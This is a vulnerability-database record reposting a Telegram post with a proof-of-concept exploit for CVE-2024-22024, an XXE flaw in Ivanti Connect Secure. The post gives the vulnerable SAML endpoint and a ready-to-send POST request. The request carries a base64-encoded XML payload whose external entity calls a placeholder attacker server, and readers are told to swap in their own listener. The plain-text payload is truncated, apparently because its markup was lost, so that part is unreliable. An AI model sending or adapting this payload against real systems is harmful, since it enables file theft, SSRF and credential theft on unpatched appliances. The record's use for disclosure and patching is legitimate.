{"uuid": "b2483eea-155a-45d5-93ec-473ede724e09", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-22024", "type": "published-proof-of-concept", "source": "https://t.me/cybersecplayground/207", "content": "\ud83d\udea8 CVE-2024-22024 - Ivanti Connect Secure XXE Exploit (SAMLRequest Injection)\n\n\ud83d\udee0 This critical vulnerability allows XML External Entity (XXE) injection via a crafted SAMLRequest parameter \u2014 enabling attackers to read internal files, SSRF, or exfiltrate data.\n\n\ud83e\udde0 Vulnerable Endpoint:\nPOST /dana-na/auth/saml-sso.cgi\n\n\ud83d\udce6 Injection Vector:\nThe vulnerability is triggered when the server processes a malicious SAMLRequest (XML-based SAML input) containing an external entity.\n\n\ud83d\udca5 Exploit Payload (Before Encoding):\n\n\n  %xxe;\n]>\n\n\ud83d\udd10 Replace {{attacker-server}} with your Burp Collaborator or HTTP listener.\n\n\ud83e\uddec Base64-Encoded Payload:\nEncode the full XML above using base64, then send it as a SAMLRequest parameter like:\nPOST /dana-na/auth/saml-sso.cgi\nContent-Type: application/x-www-form-urlencoded\nSAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjxET0NUWVBFIG5hbWU9InJvb3QiIFtdPCEtLSFFTlRJVFkgJSB4eGUgU1lTVEVNICJodHRwOi8ve3thdHRhY2tlci1zZXJ2ZXJ9fS94Ij4gJSB4eGU7XT48cj48L3I+\n\ud83d\udd0e Tip: Always double-check the encoding and test with tools like Burp Suite or Postman.\n\n\ud83d\udcd6 Reference:\n\ud83d\udd17 CVE Info\n\ud83d\udcdc Ivanti Advisory\n\ud83d\udd25 CVE-2024-22024 POC\n\n\ud83d\udd25 Impact: File read, SSRF, possible credential theft.\n\ud83d\udca1 Mitigation: Update to the latest patched version. Disable XML entity resolution on the parser.\n\n\ud83d\udce2 For more critical CVEs, PoCs, and bug bounty tactics, join us at \ud83d\udc49 @cybersecplayground\n\n\ud83d\udcac Like & Share to support the community.\n#bugbountytips #cve #infosec #xxe #saml #ivanti #exploit #cybersecurity #bugbounty #cybersec", "creation_timestamp": "2025-05-19T14:15:20.000000Z"}